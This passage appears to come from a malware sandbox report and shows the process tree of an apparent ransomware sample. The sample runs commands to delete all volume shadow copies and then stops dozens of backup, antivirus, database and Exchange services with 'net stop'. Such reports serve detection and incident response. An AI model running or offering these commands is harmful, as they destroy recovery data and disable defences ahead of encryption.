- Interacts with shadow copies
PID:2336
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵PID:3716
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3804
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin Delete Shadows /all /quiet2⤵PID:2992
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3568
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Acronis VSS Provider" /y2⤵PID:808
-
C:\Windows\SysWOW64\net.exenet stop "Acronis VSS Provider" /y3⤵PID:1184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y4⤵PID:1328
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Enterprise Client Service" /y2⤵PID:1200
-
C:\Windows\SysWOW64\net.exenet stop "Enterprise Client Service" /y3⤵PID:1828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y4⤵PID:1620
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "SQLsafe Backup Service" /y2⤵PID:1948
-
C:\Windows\SysWOW64\net.exenet stop "SQLsafe Backup Service" /y3⤵PID:2104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y4⤵PID:1936
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "SQLsafe Filter Service" /y2⤵PID:2812
-
C:\Windows\SysWOW64\net.exenet stop "SQLsafe Filter Service" /y3⤵PID:2444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y4⤵PID:3944
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Veeam Backup Catalog Data Service" /y2⤵PID:3920
-
C:\Windows\SysWOW64\net.exenet stop "Veeam Backup Catalog Data Service" /y3⤵PID:3964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y4⤵PID:3988
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop AcronisAgent /y2⤵PID:3928
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent /y3⤵PID:3324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵PID:3880
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop AcrSch2Svc /y2⤵PID:1564
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc /y3⤵PID:740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵PID:748
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop Antivirus /y2⤵PID:2776
-
C:\Windows\SysWOW64\net.exenet stop Antivirus /y3⤵PID:3152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y4⤵PID:2332
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ARSM /y2⤵PID:3144
-
C:\Windows\SysWOW64\net.exenet stop ARSM /y3⤵PID:412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y4⤵PID:3884
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecAgentAccelerator /y2⤵PID:3116
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentAccelerator /y3⤵PID:3088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵PID:3532
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecAgentBrowser /y2⤵PID:1288
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentBrowser /y3⤵PID:908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵PID:1228
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecDeviceMediaService /y2⤵PID:1532
-
C:\Windows\SysWOW64\net.exenet stop BackupExecDeviceMediaService /y3⤵PID:1612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y4⤵PID:2432
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecJobEngine /y2⤵PID:2108
-
C:\Windows\SysWOW64\net.exenet stop BackupExecJobEngine /y3⤵PID:2516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:3112
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecManagementService /y2⤵PID:2440
-
C:\Windows\SysWOW64\net.exenet stop BackupExecManagementService /y3⤵PID:3908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵PID:3940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecRPCService /y2⤵PID:3460
-
C:\Windows\SysWOW64\net.exenet stop BackupExecRPCService /y3⤵PID:3300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:3912
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecVSSProvider /y2⤵PID:3572
-
C:\Windows\SysWOW64\net.exenet stop BackupExecVSSProvider /y3⤵PID:1712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵PID:3444
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop bedbg /y2⤵PID:3184
-
C:\Windows\SysWOW64\net.exenet stop bedbg /y3⤵PID:2484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵PID:3872
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop DCAgent /y2⤵PID:3816
-
C:\Windows\SysWOW64\net.exenet stop DCAgent /y3⤵PID:2644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y4⤵PID:1344
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EPSecurityService /y2⤵PID:3952
-
C:\Windows\SysWOW64\net.exenet stop EPSecurityService /y3⤵PID:1000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y4⤵PID:488
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EPUpdateService /y2⤵PID:1280
-
C:\Windows\SysWOW64\net.exenet stop EPUpdateService /y3⤵PID:2824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y4⤵PID:1236
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EraserSvc11710 /y2⤵PID:1756
-
C:\Windows\SysWOW64\net.exenet stop EraserSvc11710 /y3⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y4⤵PID:2252
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EsgShKernel /y2⤵PID:2056
-
C:\Windows\SysWOW64\net.exenet stop EsgShKernel /y3⤵PID:3544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵PID:4016
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop FA_Scheduler /y2⤵PID:3876
-
C:\Windows\SysWOW64\net.exenet stop FA_Scheduler /y3⤵PID:3452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y4⤵PID:1984
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop IISAdmin /y2⤵PID:3536
-
C:\Windows\SysWOW64\net.exenet stop IISAdmin /y3⤵PID:2560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y4⤵PID:3820
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop IMAP4Svc /y2⤵PID:472
-
C:\Windows\SysWOW64\net.exenet stop IMAP4Svc /y3⤵PID:3224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y4⤵PID:1708
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop McShield /y2⤵PID:3732
-
C:\Windows\SysWOW64\net.exenet stop McShield /y3⤵PID:800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵PID:1292
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop McTaskManager /y2⤵PID:1456
-
C:\Windows\SysWOW64\net.exenet stop McTaskManager /y3⤵PID:2404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y4⤵PID:1840
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mfemms /y2⤵PID:2248
-
C:\Windows\SysWOW64\net.exenet stop mfemms /y3⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y4⤵PID:3672
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mfevtp /y2⤵PID:4004
-
C:\Windows\SysWOW64\net.exenet stop mfevtp /y3⤵PID:3932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y4⤵PID:3540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MMS /y2⤵PID:1776
-
C:\Windows\SysWOW64\net.exenet stop MMS /y3⤵PID:3520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵PID:3828
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mozyprobackup /y2⤵PID:348
-
C:\Windows\SysWOW64\net.exenet stop mozyprobackup /y3⤵PID:3556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵PID:420
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MsDtsServer /y2⤵PID:3808
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer /y3⤵PID:1836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y4⤵PID:1072
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MsDtsServer100 /y2⤵PID:1216
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer100 /y3⤵PID:1224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵PID:2512
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MsDtsServer110 /y2⤵PID:3580
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer110 /y3⤵PID:2408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y4⤵PID:3744
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeES /y2⤵PID:3916
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeES /y3⤵PID:3852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y4⤵PID:3188
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeIS /y2⤵PID:3036
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS /y3⤵PID:2672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵PID:4092
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeMGMT /y2⤵PID:3684
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMGMT /y3⤵PID:3548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y4⤵PID:632
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeMTA /y2⤵PID:1356
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMTA /y3⤵PID:2552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y4⤵PID:3464
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeSA /y2⤵PID:2084
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA /y3⤵PID:2076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y4⤵PID:3048
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeSRS /y2⤵PID:2488
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSRS /y3⤵PID:4024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y4⤵PID:3824
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$SQL_2008 /y2⤵PID:3516
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$SQL_2008 /y3⤵PID:1432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y4⤵PID:896
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$SYSTEM_BGC /y2⤵PID:1916
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$SYSTEM_BGC /y3⤵PID:2932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y4⤵PID:1640
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$TPS /y2⤵PID:2492
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$TPS /y3⤵PID:3924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y4⤵PID:2264
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$TPSAMA /y2⤵PID:996
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$TPSAMA /y3⤵PID:508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y4⤵PID:4008
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$BKUPEXEC /y2⤵PID:1212
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$BKUPEXEC /y3⤵PID:3776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y4⤵PID:4012
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$ECWDB2 /y2⤵PID:2260
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ECWDB2 /y3⤵PID:2940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y4⤵PID:3028
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PRACTICEMGT /y2⤵PID:3888
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PRACTICEMGT /y3⤵PID:3256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y4⤵PID:3528
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PRACTTICEBGC /y2⤵PID:3812
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PRACTTICEBGC /y3⤵PID:1452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵PID:608
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y2⤵PID:856
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PROFXENGAGEMENT /y3⤵PID:3576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y4⤵PID:3960
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SBSMONITORING /y2⤵PID:3984
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SBSMONITORING /y3⤵PID:3564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y4⤵PID:2708
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SHAREPOINT /y2⤵PID:4040
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SHAREPOINT /y3⤵PID:3560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y4⤵PID:4048
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SQL_2008 /y2⤵PID:3552
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL_2008 /y3⤵PID:1360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y4⤵PID:1880
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SYSTEM_BGC /y2⤵PID:1540
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SYSTEM_BGC /y3⤵PID:804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y4⤵PID:848
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$TPS /y2⤵PID:3980
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$TPS /y3⤵PID:852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y4⤵PID:3296
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$TPSAMA /y2⤵PID:3440
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$TPSAMA /y3⤵PID:3136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵PID:3668
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:3996
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:2328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:2400
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2012 /y2⤵PID:1172
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$VEEAMSQL2012 /y3⤵PID:2420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y4⤵PID:1928
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher /y2⤵PID:1544
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher /y3⤵PID:4036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y4⤵PID:2416
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:788
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:1736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:3336
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:2836
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:3272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:1932
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:4116
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:4152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:4172
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:4192
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:4228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:4248
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:4268
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:4304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:4324
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$TPS /y2⤵PID:4344
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$TPS /y3⤵PID:4380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y4⤵PID:4400
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y2⤵PID:4424
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$TPSAMA /y3⤵PID:4460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y4⤵PID:4480
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLSERVER /y2⤵PID:4500
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER /y3⤵PID:4536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y4⤵PID:4556
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLServerADHelper100 /y2⤵PID:4576
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper100 /y3⤵PID:4612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y4⤵PID:4632
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLServerOLAPService /y2⤵PID:4652
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerOLAPService /y3⤵PID:4688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y4⤵PID:4708
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MySQL57 /y2⤵PID:4728
-
C:\Windows\SysWOW64\net.exenet stop MySQL57 /y3⤵PID:4764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y4⤵PID:4784
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ntrtscan /y2⤵PID:4804
-
C:\Windows\SysWOW64\net.exenet stop ntrtscan /y3⤵PID:4840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y4⤵PID:4860
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop OracleClientCache80 /y2⤵PID:4880
-
C:\Windows\SysWOW64\net.exenet stop OracleClientCache80 /y3⤵PID:4916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y4⤵PID:4936
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop PDVFSService /y2⤵PID:4956
-
C:\Windows\SysWOW64\net.exenet stop PDVFSService /y3⤵PID:4992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:5012
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop POP3Svc /y2⤵PID:5032
-
C:\Windows\SysWOW64\net.exenet stop POP3Svc /y3⤵PID:5068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y4⤵PID:5088
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer /y2⤵PID:5108
-
C:\Windows\SysWOW64\net.exenet stop ReportServer /y3⤵PID:3896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y4⤵PID:3148
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$SQL_2008 /y2⤵PID:4160
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$SQL_2008 /y3⤵PID:4148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵PID:4200
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$SYSTEM_BGC /y2⤵PID:4260
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$SYSTEM_BGC /y3⤵PID:4212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y4⤵PID:4332
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$TPS /y2⤵PID:4316
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$TPS /y3⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y4⤵PID:4412
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$TPSAMA /y2⤵PID:4372
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$TPSAMA /y3⤵PID:4496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y4⤵PID:4464
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop RESvc /y2⤵PID:4444
-
C:\Windows\SysWOW64\net.exenet stop RESvc /y3⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y4⤵PID:4504
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop sacsvr /y2⤵PID:4592
-
C:\Windows\SysWOW64\net.exenet stop sacsvr /y3⤵PID:4604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y4⤵PID:4588
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SamSs /y2⤵PID:4724
-
C:\Windows\SysWOW64\net.exenet stop SamSs /y3⤵PID:4676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵PID:4772
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SAVAdminService /y2⤵PID:4780
-
C:\Windows\SysWOW64\net.exenet stop SAVAdminService /y3⤵PID:4812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y4⤵PID:4872
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SAVService /y2⤵PID:4836
-
C:\Windows\SysWOW64\net.exenet stop SAVService /y3⤵PID:4944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y4⤵PID:4928
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SDRSVC /y2⤵PID:4904
-
C:\Windows\SysWOW64\net.exenet stop SDRSVC /y3⤵PID:5016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y4⤵PID:4988
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SepMasterService /y2⤵PID:5040
-
C:\Windows\SysWOW64\net.exenet stop SepMasterService /y3⤵PID:5072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y4⤵PID:5052
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ShMonitor /y2⤵PID:1628
-
C:\Windows\SysWOW64\net.exenet stop ShMonitor /y3⤵PID:5112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y4⤵PID:4176
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop Smcinst /y2⤵PID:4208
-
C:\Windows\SysWOW64\net.exenet stop Smcinst /y3⤵PID:4184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y4⤵PID:4320
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SmcService /y2⤵PID:4204
-
C:\Windows\SysWOW64\net.exenet stop SmcService /y3⤵PID:4408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y4⤵PID:4416
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SMTPSvc /y2⤵PID:4308
-
C:\Windows\SysWOW64\net.exenet stop SMTPSvc /y3⤵PID:4428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y4⤵PID:4488
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$BKUPEXEC /y2⤵PID:4368
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$BKUPEXEC /y3⤵PID:4528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y4⤵PID:4572
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SQLAgent$ECWDB2 /y2⤵PID:4580
-
